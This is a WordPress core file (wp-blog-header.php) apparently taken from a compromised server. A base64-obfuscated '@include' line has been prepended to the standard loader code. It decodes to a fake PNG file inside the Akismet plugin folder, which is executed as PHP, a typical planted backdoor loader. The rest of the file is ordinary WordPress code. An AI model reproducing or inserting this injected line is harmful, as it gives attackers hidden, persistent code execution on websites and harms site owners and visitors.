File: /home/xh034600/www_root_marco_sk/wp-blog-header.php
<?php @include base64_decode("Ly9ob21lL3hoMDM0NjAwL3d3d19yb290X21hcmNvX3NrL3dwLWNvbnRlbnQvcGx1Z2lucy9ha2lzbWV0L19pbmMvaW1nL2xvZ28tcHBvc3BucW9ucnBzcXJub3AucG5n");?><?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}